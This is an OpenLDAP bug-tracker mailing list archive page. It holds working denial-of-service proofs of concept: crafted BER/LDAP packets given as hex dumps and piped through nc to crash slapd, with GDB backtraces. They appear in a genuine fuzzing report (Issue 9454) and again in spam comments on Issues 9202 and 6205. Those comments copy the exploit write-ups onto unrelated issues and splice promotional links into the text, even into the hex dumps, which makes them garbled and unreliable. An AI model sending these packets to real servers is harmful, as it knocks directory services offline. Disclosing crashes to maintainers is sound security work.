- openldap-bugs - openldap.org

[Issue 9202] Should limit depth of nested filters
by openldap-its＠openldap.org 11 Sep '21

11 Sep '21

https://bugs.openldap.org/show_bug.cgi?id=9202 --- Comment #10 from Mehmet gelisin <mehmetgelisin(a)aol.com> --- OpenLDAP ber_get_next Denial of Service Affected Versions: OpenLDAP <= 2.4.42 +-------------+ | Description | +-------------+ This document details http://www-look-4.com/ a vulnerability found within the OpenLDAP server daemon. A Denial of Service vulnerability was discovered within the slapd daemon, allowing an unauthenticated attacker to crash the OpenLDAP server. http://www.compilatori.com/ By sending a crafted packet, an attacker may cause the OpenLDAP server to reach an assert(9 9 statement, crashing the daemon. This was tested on OpenLDAP 2.4.42 (built with GCC 4.9.2) and OpenLDAP 2.4.40 installed from the Debian package repository. http://www.wearelondonmade.com/ +--------------+ | Exploitation | +--------------+ By sending a crafted packet, an attacker can cause the OpenLDAP http://www.jopspeech.com/ daemon to crash with a SIGABRT. This is due to an assert() call within the ber_get_next method (io.c line 682) that is hit when decoding tampered BER data. The following proof of concept exploit can be used to trigger the condition: http://joerg.li/ --[ Exploit POC echo "/4SEhISEd4MKYj5ZMgAAAC8=" | base64 -d | nc -v 127.0.0.1 389 The above causes slapd to abort as follows when running with '-d3', however it should be noted that this will crash the server even when running in daemon mode. http://connstr.net/ --[ adadp -d3 55f0b36e slap_listener_activate(7): 55f0b36e >>> slap_listener(ldap:///) 55f0b36e connection_get(15): got connid=1000 55f0b36e connection_read(15): checking for input on id=1000 http://embermanchester.uk/ ber_get_next ldap_read: want=8, got=8 0000: ff 84 84 84 84 84 77 83 ......w. 55f0b36e connection_get(15): got connid=1000 55f0b36e connection_read(15): checking for input on id=1000 ber_get_next http://www.slipstone.co.uk/ ldap_read: want=1, got=1 0000: 0a . 55f0b36e connection_get(15): got connid=1000 55f0b36e connection_read(15): checking for input on id=1000 ber_get_next slapd: io.c:682: ber_get_next: Assertion `0' failed. http://www.logoarts.co.uk/ The following GDB back trace provides further information as to the location of the issue. --[ back trace program received signal SIGABRT, Aborted. [Switching to Thread 0x7ffff2e4a700 (LWP 1371)] http://www.acpirateradio.co.uk/ 0x00007ffff6a13107 in __GI_raise (sig=sig@entry=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56 56 ../nptl/sysdeps/ux%x/sysv/linux/raise.c: No such file or directory. (gdb) bt https://waytowhatsnext.com/ OpenLDAP ber_get_next Denial of Service Affected Versions: OpenLDAP <= 2.4.42 +-------------+ | Description | +-------------+ This document details a vulnerability found within the OpenLDAP server daemon. A Denial of Service vulnerability was discovered within the slapd daemon, allowing an unauthenticated attacker to crash the OpenLDAP server. https://www.webb-dev.co.uk/ By sending a crafted packet, an attacker may cause the OpenLDAP server to reach an assert(9 9 statement, crashing the daemon. This was tested on OpenLDAP 2.4.42 (built with GCC 4.9.2) and OpenLDAP 2.4.40 installed from the Debian package repository. +--------------+ | Exploitation | +--------------+ By sending a crafted packet, an attacker can cause the OpenLDAP daemon to crash with a SIGABRT. This is due to an assert() call within the ber_get_next method (io.c line 682) that is hit when decoding tampered BER data. The following proof of concept exploit can be used to trigger the condition: http://www.iu-bloomington.com/ --[ Exploit POC echo "/4SEhISEd4MKYj5ZMgAAAC8=" | base64 -d | nc -v 127.0.0.1 389 The above causes slapd to abort as follows when running with '-d3', however it should be noted that this will crash the server even when running in daemon mode. --[ adadp -d3 55f0b36e slap_listener_activate(7): 55f0b36e >>> slap_listener(ldap:///) 55f0b36e connection_get(15): got connid=1000 55f0b36e connection_read(15): checking for input on id=1000 ber_get_next ldap_read: want=8, got=8 0000: ff 84 84 84 84 84 77 83 ......w. 55f0b36e connection_get(15): got connid=1000 55f0b36e connection_read(15): checking for input on id=1000 ber_get_next ldap_read: want=1, got=1 0000: 0a . 55f0b36e connection_get(15): got connid=1000 55f0b36e connection_read(15): checking for input on id=1000 ber_get_next slapd: io.c:682: ber_get_next: Assertion `0' failed. The following GDB back trace provides further information as to the location of the issue. --[ back trace program received signal SIGABRT, Aborted. [Switching to Thread 0x7ffff2e4a700 (LWP 1371)] 0x00007ffff6a13107 in __GI_raise (sig=sig@entry=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56 56 ../nptl/sysdeps/ux%x/sysv/linux/raise.c: No such file or directory. (gdb) bt -- You are receiving this mail because: You are on the CC list for the issue.

1 0

[Issue 9454] New: A malicious packet can force OpenLDAP to fail an assertion and crash (schema_init.c:3808: checkTime)
by openldap-its＠openldap.org 11 Sep '21

11 Sep '21

https://bugs.openldap.org/show_bug.cgi?id=9454 Issue ID: 9454 Summary: A malicious packet can force OpenLDAP to fail an assertion and crash (schema_init.c:3808: checkTime) Product: OpenLDAP Version: unspecified Hardware: All OS: All Status: UNCONFIRMED Severity: normal Priority: --- Component: slapd Assignee: bugs(a)openldap.org Reporter: phasip(a)gmail.com Target Milestone: --- A malicious packet can force OpenLDAP to fail an assertion and crash slapd: schema_init.c:3808: checkTime: Assertion `!BER_BVISEMPTY( in )' failed. Packet: 00000000: 3082 016a 0201 3063 30df df30 0030 0030 0..j..0c0..0.0.0 00000010: 0030 0030 0030 00a0 8201 3030 0030 0930 .0.0.0....00.0.0 00000020: 3030 3030 3030 3030 302e 3030 3030 3030 000000000.000000 00000030: 3030 3030 3030 3030 3030 3030 3030 3030 0000000000000000 00000040: 3030 3030 3030 3030 3030 3030 3030 3030 0000000000000000 00000050: 3030 3030 3030 3030 a930 8109 322e 352e 00000000.0..2.5. 00000060: 3133 2e33 3883 2e7b 2020 2020 7468 6973 13.38..{ this 00000070: 5570 6461 7465 2020 2020 2022 2220 2c69 Update "" ,i 00000080: 7373 7545 7220 7264 6e53 6571 7565 6e63 ssuEr rdnSequenc 00000090: 653a 2222 7d30 3030 3030 3030 3030 3030 e:""}00000000000 000000a0: 3030 3030 3030 3030 3030 3030 3030 3030 0000000000000000 000000b0: 3030 3030 3030 3030 3030 3030 3030 3030 0000000000000000 000000c0: 3030 3030 3030 3030 3030 3030 3030 3030 0000000000000000 000000d0: 3030 3030 3030 3030 3030 3030 3030 3030 0000000000000000 000000e0: 3030 3030 3030 3030 3030 3030 3030 3030 0000000000000000 000000f0: 3030 3030 3030 3030 3030 3030 3030 3030 0000000000000000 00000100: 3030 3030 3030 3030 3030 3030 3030 3030 0000000000000000 00000110: 3030 3030 3030 3030 3030 3030 3030 3030 0000000000000000 00000120: 3030 3030 3030 3030 3030 3030 3030 3030 0000000000000000 00000130: 3030 3030 3030 3030 3030 3030 3030 3030 0000000000000000 00000140: 3030 3030 3030 3030 3030 3030 3030 3030 0000000000000000 00000150: 3030 3030 3030 3030 3030 3030 3030 3030 0000000000000000 00000160: 3030 3030 3030 3030 3030 3030 3030 00000000000000 GDB output: [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". 601e59e1 @(#) $OpenLDAP: slapd 2.X (Feb 6 2021 08:48:29) $ @3790967905a3:/openldap/servers/slapd 601e59e1 slapd starting [New Thread 0x7fff8b2d3700 (LWP 13)] [New Thread 0x7fff8aad2700 (LWP 14)] 601e59e6 conn=1000 fd=11 ACCEPT from IP=127.0.0.1:42330 (IP=0.0.0.0:1389) [New Thread 0x7fff8a2d1700 (LWP 15)] 601e59e6 get_filter: unknown filter type=48 601e59e6 get_filter: unknown filter type=48 601e59e6 get_filter: unknown filter type=48 slapd: schema_init.c:3808: checkTime: Assertion `!BER_BVISEMPTY( in )' failed. Thread 3 "slapd" received signal SIGABRT, Aborted. [Switching to Thread 0x7fff8aad2700 (LWP 14)] __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50 50 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory. (gdb) bt #0 __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50 #1 0x00007ffff7dd4859 in __GI_abort () at abort.c:79 #2 0x00007ffff7dd4729 in __assert_fail_base ( fmt=0x7ffff7f6a588 "%s%s%s:%u: %s%sAssertion `%s' failed.\n%n", assertion=0x55555568d363 "!BER_BVISEMPTY( in )", file=0x55555568d2f3 "schema_init.c", line=3808, function=<optimized out>) at assert.c:92 #3 0x00007ffff7de5f36 in __GI___assert_fail ( assertion=assertion@entry=0x55555568d363 "!BER_BVISEMPTY( in )", file=file@entry=0x55555568d2f3 "schema_init.c", line=line@entry=3808, function=function@entry=0x5555556908f0 <__PRETTY_FUNCTION__.14047> "checkTime") at assert.c:101 #4 0x00005555555bac61 in checkTime (in=in@entry=0x7fff8aad06f0, out=out@entry=0x0) at schema_init.c:3808 #5 0x00005555555bcd1a in issuerAndThisUpdatePretty (syntax=0x555555784150, in=0x7fff8aad0800, out=0x7fff8aad0770, ctx=0x7fff7c001630) at schema_init.c:4095 #6 0x000055555559df4d in asserted_value_validate_normalize (ad=0x0, mr=0x555555789e50, usage=usage@entry=2049, in=in@entry=0x7fff8aad0800, out=out@entry=0x7fff8aad0828, text=text@entry=0x7fff8aad1aa0, ctx=0x7fff7c001630) at value.c:153 #7 0x00005555555d3a94 in get_mra (op=op@entry=0x7fff7c0010f0, ber=ber@entry=0x7fff7c000f10, f=f@entry=0x7fff8aad08c0, --Type <RET> for more, q to quit, c to continue without paging-- text=text@entry=0x7fff8aad1aa0) at mra.c:198 #8 0x0000555555587543 in get_filter0 (op=op@entry=0x7fff7c0010f0, ber=ber@entry=0x7fff7c000f10, filt=filt@entry=0x7fff7c0016e8, text=text@entry=0x7fff8aad1aa0, depth=depth@entry=1) at filter.c:290 #9 0x0000555555587793 in get_filter_list (op=op@entry=0x7fff7c0010f0, ber=ber@entry=0x7fff7c000f10, f=f@entry=0x7fff8aad0988, text=text@entry=0x7fff8aad1aa0, depth=depth@entry=1) at filter.c:354 #10 0x000055555558731e in get_filter0 (op=op@entry=0x7fff7c0010f0, ber=0x7fff7c000f10, filt=filt@entry=0x7fff7c001170, text=text@entry=0x7fff8aad1aa0, depth=depth@entry=0) at filter.c:235 #11 0x00005555555880b6 in get_filter (op=op@entry=0x7fff7c0010f0, ber=<optimized out>, filt=filt@entry=0x7fff7c001170, text=text@entry=0x7fff8aad1aa0) at filter.c:332 #12 0x0000555555585396 in do_search (op=0x7fff7c0010f0, rs=0x7fff8aad1a80) at search.c:127 #13 0x0000555555583d09 in connection_operation (ctx=ctx@entry=0x7fff8aad1ba0, arg_v=0x7fff7c0010f0) at connection.c:1163 #14 0x0000555555584370 in connection_read_thread (ctx=0x7fff8aad1ba0, argv=0xb) at connection.c:1314 #15 0x00005555556711e4 in ldap_int_thread_pool_wrapper (xpool=0x555555799240) at tpool.c:1051 #16 0x00007ffff7faa609 in start_thread (arg=<optimized out>) at pthread_create.c:477 --Type <RET> for more, q to quit, c to continue without paging-- #17 0x00007ffff7ed1293 in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:95 Testing: 1. Launch openldap (Current public repo) docker run -it --net=host bitnami/openldap (More recent develop) docker run -it --net=host phasip/openldap 2. Send crashing packet echo -en '\x30\x82\x01\x6a\x02\x01\x30\x63\x30\xdf\xdf\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\xa0\x82\x01\x30\x30\x00\x30\x09\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x2e\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\xa9\x30\x81\x09\x32\x2e\x35\x2e\x31\x33\x2e\x33\x38\x83\x2e\x7b\x20\x20\x20\x20\x74\x68\x69\x73\x55\x70\x64\x61\x74\x65\x20\x20\x20\x20\x20\x22\x22\x20\x2c\x69\x73\x73\x75\x45\x72\x20\x72\x64\x6e\x53\x65\x71\x75\x65\x6e\x63\x65\x3a\x22\x22\x7d\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30' | nc localhost 1389 -- Note -- I had forgotten the fuzzer was running. As only one crash has been found in a while the fuzzing machine will retire now. I will collect the corpus into https://github.com/Phasip/openldap_fuzz -- You are receiving this mail because: You are on the CC list for the issue.

1 4

[Issue 6205] Discuss slapadd -S in Admin guide appendix
by openldap-its＠openldap.org 11 Sep '21

11 Sep '21

https://bugs.openldap.org/show_bug.cgi?id=6205 --- Comment #4 from Mehmet gelisin <mehmetgelisin(a)aol.com> --- malicious packet can force OpenLDAP to fail an assertion and crash slapd: schema_init.c:3808: checkTime: Assertion `!BER_BVISEMPTY( in )' failed. Packet: 00000000: 3082 016a http://www-look-4.com/ 0201 3063 30df df30 0030 0030 0..j..0c0..0.0.0 00000010: 0030 0030 0030 00a0 8201 3030 0030 0930 .0.0.0....00.0.0 00000020: 3030 3030 3030 3030 302e 3030 3030 3030 000000000.000000 00000030: 3030 3030 3030 3030 3030 3030 3030 3030 0000000000000000 00000040: 3030 3030 3030 3030 http://www.compilatori.com/ 3030 3030 3030 3030 0000000000000000 00000050: 3030 3030 3030 3030 a930 8109 322e 352e 00000000.0..2.5. 00000060: 3133 2e33 3883 2e7b 2020 2020 7468 6973 13.38..{ this 00000070: 5570 6461 7465 2020 http://www.wearelondonmade.com/ 2020 2022 2220 2c69 Update "" ,i 00000080: 7373 7545 7220 7264 6e53 6571 7565 6e63 ssuEr rdnSequenc 00000090: 653a 2222 7d30 3030 3030 3030 3030 3030 e:""}00000000000 000000a0: 3030 3030 3030 3030 http://www.jopspeech.com/ 3030 3030 3030 3030 0000000000000000 000000b0: 3030 3030 3030 3030 3030 3030 3030 3030 0000000000000000 000000c0: 3030 3030 3030 3030 3030 3030 3030 3030 0000000000000000 000000d0: 3030 3030 3030 3030 http://joerg.li/ 3030 3030 3030 3030 0000000000000000 000000e0: 3030 3030 3030 3030 3030 3030 3030 3030 0000000000000000 000000f0: 3030 3030 3030 3030 3030 3030 3030 3030 0000000000000000 00000100: 3030 3030 3030 3030 3030 3030 3030 3030 0000000000000000 00000110: 3030 3030 3030 3030 3030 3030 3030 3030 0000000000000000 00000120: 3030 3030 3030 3030 3030 3030 3030 3030 0000000000000000 00000130: 3030 3030 3030 3030 3030 3030 3030 3030 0000000000000000 00000140: 3030 3030 3030 3030 http://connstr.net/ 3030 3030 3030 3030 0000000000000000 00000150: 3030 3030 3030 3030 3030 3030 3030 3030 0000000000000000 00000160: 3030 3030 3030 3030 3030 3030 3030 00000000000000 GDB output: http://embermanchester.uk/ [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". 601e59e1 @(#) $OpenLDAP: slapd 2.X (Feb 6 2021 08:48:29) $ @3790967905a3:/openldap/servers/slapd 601e59e1 slapd starting [New Thread 0x7fff8b2d3700 (LWP 13)] [New Thread 0x7fff8aad2700 (LWP 14)] http://www.slipstone.co.uk/ 601e59e6 conn=1000 fd=11 ACCEPT from IP=127.0.0.1:42330 (IP=0.0.0.0:1389) [New Thread 0x7fff8a2d1700 (LWP 15)] 601e59e6 get_filter: unknown filter type=48 601e59e6 get_filter: unknown filter type=48 601e59e6 get_filter: unknown filter type=48 slapd: schema_init.c:3808: checkTime: Assertion `!BER_BVISEMPTY( in )' failed. http://www.logoarts.co.uk/ Thread 3 "slapd" received signal SIGABRT, Aborted. [Switching to Thread 0x7fff8aad2700 (LWP 14)] __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50 50 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory. (gdb) bt http://www.acpirateradio.co.uk/ #0 __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50 #1 0x00007ffff7dd4859 in __GI_abort () at abort.c:79 #2 0x00007ffff7dd4729 in __assert_fail_base ( fmt=0x7ffff7f6a588 "%s%s%s:%u: %s%sAssertion `%s' failed.\n%n", assertion=0x55555568d363 "!BER_BVISEMPTY( in )", file=0x55555568d2f3 "schema_init.c", line=3808, function=<optimized out>) at assert.c:92 #3 0x00007ffff7de5f36 in __GI___assert_fail ( https://waytowhatsnext.com/ assertion=assertion@entry=0x55555568d363 "!BER_BVISEMPTY( in )", file=file@entry=0x55555568d2f3 "schema_init.c", line=line@entry=3808, function=function@entry=0x5555556908f0 <__PRETTY_FUNCTION__.14047> "checkTime") at assert.c:101 #4 0x00005555555bac61 in checkTime (in=in@entry=0x7fff8aad06f0, out=out@entry=0x0) at schema_init.c:3808 #5 0x00005555555bcd1a in issuerAndThisUpdatePretty (syntax=0x555555784150, in=0x7fff8aad0800, out=0x7fff8aad0770, ctx=0x7fff7c001630) at schema_init.c:4095 https://www.webb-dev.co.uk/ #6 0x000055555559df4d in asserted_value_validate_normalize (ad=0x0, mr=0x555555789e50, usage=usage@entry=2049, in=in@entry=0x7fff8aad0800, out=out@entry=0x7fff8aad0828, text=text@entry=0x7fff8aad1aa0, ctx=0x7fff7c001630) at value.c:153 #7 0x00005555555d3a94 in get_mra (op=op@entry=0x7fff7c0010f0, ber=ber@entry=0x7fff7c000f10, f=f@entry=0x7fff8aad08c0, --Type <RET> for more, q to quit, c to continue without paging-- text=text@entry=0x7fff8aad1aa0) at mra.c:198 #8 0x0000555555587543 in get_filter0 (op=op@entry=0x7fff7c0010f0, http://www.iu-bloomington.com/ ber=ber@entry=0x7fff7c000f10, filt=filt@entry=0x7fff7c0016e8, text=text@entry=0x7fff8aad1aa0, depth=depth@entry=1) at filter.c:290 #9 0x0000555555587793 in get_filter_list (op=op@entry=0x7fff7c0010f0, ber=ber@entry=0x7fff7c000f10, f=f@entry=0x7fff8aad0988, text=text@entry=0x7fff8aad1aa0, depth=depth@entry=1) at filter.c:354 #10 0x000055555558731e in get_filter0 (op=op@entry=0x7fff7c0010f0, ber=0x7fff7c000f10, filt=filt@entry=0x7fff7c001170, text=text@entry=0x7fff8aad1aa0, depth=depth@entry=0) at filter.c:235 #11 0x00005555555880b6 in get_filter (op=op@entry=0x7fff7c0010f0, ber=<optimized out>, filt=filt@entry=0x7fff7c001170, text=text@entry=0x7fff8aad1aa0) at filter.c:332 #12 0x0000555555585396 in do_search (op=0x7fff7c0010f0, rs=0x7fff8aad1a80) at search.c:127 #13 0x0000555555583d09 in connection_operation (ctx=ctx@entry=0x7fff8aad1ba0, arg_v=0x7fff7c0010f0) at connection.c:1163 #14 0x0000555555584370 in connection_read_thread (ctx=0x7fff8aad1ba0, argv=0xb) at connection.c:1314 #15 0x00005555556711e4 in ldap_int_thread_pool_wrapper (xpool=0x555555799240) at tpool.c:1051 #16 0x00007ffff7faa609 in start_thread (arg=<optimized out>) at pthread_create.c:477 --Type <RET> for more, q to quit, c to continue without paging-- #17 0x00007ffff7ed1293 in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:95 Testing: 1. Launch openldap (Current public repo) docker run -it --net=host bitnami/openldap (More recent develop) docker run -it --net=host phasip/openldap 2. Send crashing packet echo -en '\x30\x82\x01\x6a\x02\x01\x30\x63\x30\xdf\xdf\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\xa0\x82\x01\x30\x30\x00\x30\x09\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x2e\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\xa9\x30\x81\x09\x32\x2e\x35\x2e\x31\x33\x2e\x33\x38\x83\x2e\x7b\x20\x20\x20\x20\x74\x68\x69\x73\x55\x70\x64\x61\x74\x65\x20\x20\x20\x20\x20\x22\x22\x20\x2c\x69\x73\x73\x75\x45\x72\x20\x72\x64\x6e\x53\x65\x71\x75\x65\x6e\x63\x65\x3a\x22\x22\x7d\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30' -- You are receiving this mail because: You are on the CC list for the issue.

1 0

[Issue 8852] slapd memory use grows continuously with non-delta syncrepl and modifying groups
by openldap-its＠openldap.org 10 Sep '21

10 Sep '21

https://bugs.openldap.org/show_bug.cgi?id=8852 Quanah Gibson-Mount <quanah(a)openldap.org> changed: What |Removed |Added ---------------------------------------------------------------------------- Keywords|reviewed | -- You are receiving this mail because: You are on the CC list for the issue.

1 0

[Issue 8757] RFE: let slapd MMR instances vote primary master
by openldap-its＠openldap.org 10 Sep '21

10 Sep '21

https://bugs.openldap.org/show_bug.cgi?id=8757 Quanah Gibson-Mount <quanah(a)openldap.org> changed: What |Removed |Added ---------------------------------------------------------------------------- Keywords|reviewed | -- You are receiving this mail because: You are on the CC list for the issue.

1 0

[Issue 8748] New feature for LMDB
by openldap-its＠openldap.org 10 Sep '21

10 Sep '21

https://bugs.openldap.org/show_bug.cgi?id=8748 Quanah Gibson-Mount <quanah(a)openldap.org> changed: What |Removed |Added ---------------------------------------------------------------------------- Keywords|lmdb-scratch | -- You are receiving this mail because: You are on the CC list for the issue.

1 0

[Issue 6010] substitution for acl sets
by openldap-its＠openldap.org 10 Sep '21

10 Sep '21

https://bugs.openldap.org/show_bug.cgi?id=6010 Quanah Gibson-Mount <quanah(a)openldap.org> changed: What |Removed |Added ---------------------------------------------------------------------------- Keywords|OL_2_6_REQ | -- You are receiving this mail because: You are on the CC list for the issue.

1 0

[Issue 9672] New: Permit static linking with libsasl2
by openldap-its＠openldap.org 10 Sep '21

10 Sep '21

https://bugs.openldap.org/show_bug.cgi?id=9672 Issue ID: 9672 Summary: Permit static linking with libsasl2 Product: OpenLDAP Version: unspecified Hardware: All OS: All Status: UNCONFIRMED Severity: normal Priority: --- Component: build Assignee: bugs(a)openldap.org Reporter: dpa-openldap(a)aegee.org Target Milestone: --- Created attachment 838 --> https://bugs.openldap.org/attachment.cgi?id=838&action=edit pkg-config + libsasl2 = ♥ I want to link slapd statically. First I link openssl and libsasl2 statically. The static libsasl2 bundles all SASL plugins, and linking towards it must be done (in my case) with -lcrypto. The check in configure.ac: ``` AC_CHECK_LIB(sasl2, sasl_client_init, [ol_link_sasl="-lsasl2"], [AC_CHECK_LIB(sasl, sasl_client_init, [ol_link_sasl="-lsasl"])]) ``` fails, since -lcrypto is not passed during linking with the static -lsasl2 . `pkg-config --statit libsasl2 --libs` knows how to link statically with libsasl2 and it knows, whether libsasl2 is installed. The applied patch does linking/preprocessing of libsasl2 by utilizing pkg-config, when available. -- You are receiving this mail because: You are on the CC list for the issue.

1 3

[Issue 9676] New: slapadd -n0 does need -F parameter, despite the documentation
by openldap-its＠openldap.org 09 Sep '21

09 Sep '21

https://bugs.openldap.org/show_bug.cgi?id=9676 Issue ID: 9676 Summary: slapadd -n0 does need -F parameter, despite the documentation Product: OpenLDAP Version: 2.5.7 Hardware: All OS: All Status: UNCONFIRMED Severity: normal Priority: --- Component: slapd Assignee: bugs(a)openldap.org Reporter: dpa-openldap(a)aegee.org Target Milestone: --- My reading of the documentation of slapadd is, that when `slapadd -n0 -linit0.ldif` is called, and the default config directory exists, and is empty, sladadd will create the cn=config database in the default config directory. ``` -F confdir specify a config directory. If both -f and -F are specified, the config file will be read and converted to config directory format and written to the specified directory. If neither option is specified, an attempt to read the default config directory will be made before trying to use the default config file. If a valid config directory exists then the default config file is ignored. If dry-run mode is also specified, no conversion will occur. ``` My default config directory is "/data/config" ( CFLAGS="-DSLAPD_DEFAULT_CONFIGDIR='\"/data/config\"' ) calling strace slapadd -n0 -linit0.ldif prints: [pid 573949] newfstatat(AT_FDCWD, "/data/config", <unfinished ...> [pid 573949] <... newfstatat resumed>{st_mode=S_IFDIR|0755, st_size=4096, ...}, 0) = 0 [pid 573949] mmap(NULL, 1052672, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0 <unfinished ...> [pid 573949] <... mmap resumed>) = 0x7f050183a000 [pid 573949] gettimeofday( <unfinished ...> [pid 573949] <... gettimeofday resumed>{tv_sec=1631220679, tv_usec=401535}, NULL) = 0 [pid 573949] openat(AT_FDCWD, "/data/config/cn=config.ldif", O_RDONLY <unfinished ...> [pid 573949] <... openat resumed>) = -1 ENOENT (No such file or directory) [pid 573949] munmap(0x7f050183a000, 1052672 <unfinished ...> [pid 573949] <... munmap resumed>) = 0 [pid 573949] newfstatat(AT_FDCWD, "//etc/openldap/slapd.conf", <unfinished ...> [pid 573949] <... newfstatat resumed>0x7ffda7228410, 0) = -1 ENOENT (No such file or directory) [pid 573949] write(2, "slapadd: bad configuration file!\n", 33 <unfinished ...> So it fails. If I call instead slapadd -n0 -linit0.ldif -F/data/config the output is [pid 575257] openat(AT_FDCWD, "/home/d/data/config", O_RDONLY|O_CLOEXEC <unfinished ...> [pid 575257] <... openat resumed>) = 12 [pid 575257] epoll_ctl(4, EPOLL_CTL_ADD, 12, {events=EPOLLIN|EPOLLOUT|EPOLLRDHUP|EPOLLET, data={u32=740160072, u64=139733206168136}} <unfinished ...> [pid 575257] <... epoll_ctl resumed>) = -1 EPERM (Operation not permitted) [pid 575257] epoll_ctl(4, EPOLL_CTL_DEL, 12, 0xc0005a1b34 <unfinished ...> [pid 575257] <... epoll_ctl resumed>) = -1 EPERM (Operation not permitted) [pid 575257] getdents64(12, <unfinished ...> [pid 575257] <... getdents64 resumed>0xc000710000 /* 2 entries */, 8192) = 48 [pid 575257] getdents64(12, <unfinished ...> [pid 575257] <... getdents64 resumed>0xc000710000 /* 0 entries */, 8192) = 0 [pid 575257] close(12 <unfinished ...> [pid 575257] <... close resumed>) = 0 … and data/config is filled with content -- You are receiving this mail because: You are on the CC list for the issue.

1 2

[Issue 6949] OpenLDAP Logging
by openldap-its＠openldap.org 08 Sep '21

08 Sep '21

https://bugs.openldap.org/show_bug.cgi?id=6949 --- Comment #10 from Quanah Gibson-Mount <quanah(a)openldap.org> --- RE26: Commits: • eedd08fd by Ondřej Kuzník at 2021-09-08T18:30:16+00:00 ITS#6949 Extract logging code so lloadd can also use it • a40243d9 by Ondřej Kuzník at 2021-09-08T18:30:20+00:00 ITS#6949 Save errno • ae268711 by Ondřej Kuzník at 2021-09-08T18:30:27+00:00 ITS#6949 Allow for fd 0 -- You are receiving this mail because: You are on the CC list for the issue.

1 0

[Issue 6949] OpenLDAP Logging
by openldap-its＠openldap.org 08 Sep '21

08 Sep '21

https://bugs.openldap.org/show_bug.cgi?id=6949 Quanah Gibson-Mount <quanah(a)openldap.org> changed: What |Removed |Added ---------------------------------------------------------------------------- Resolution|--- |TEST Status|CONFIRMED |RESOLVED --- Comment #9 from Quanah Gibson-Mount <quanah(a)openldap.org> --- Commits: • 2abbf678 by Ondřej Kuzník at 2021-09-08T15:53:02+00:00 ITS#6949 Extract logging code so lloadd can also use it • dc6b6276 by Ondřej Kuzník at 2021-09-08T15:53:02+00:00 ITS#6949 Save errno • c2b81a3c by Ondřej Kuzník at 2021-09-08T15:53:02+00:00 ITS#6949 Allow for fd 0 -- You are receiving this mail because: You are on the CC list for the issue.

1 0

[Issue 5540] Normalization assertion in attr.c
by openldap-its＠openldap.org 08 Sep '21

08 Sep '21

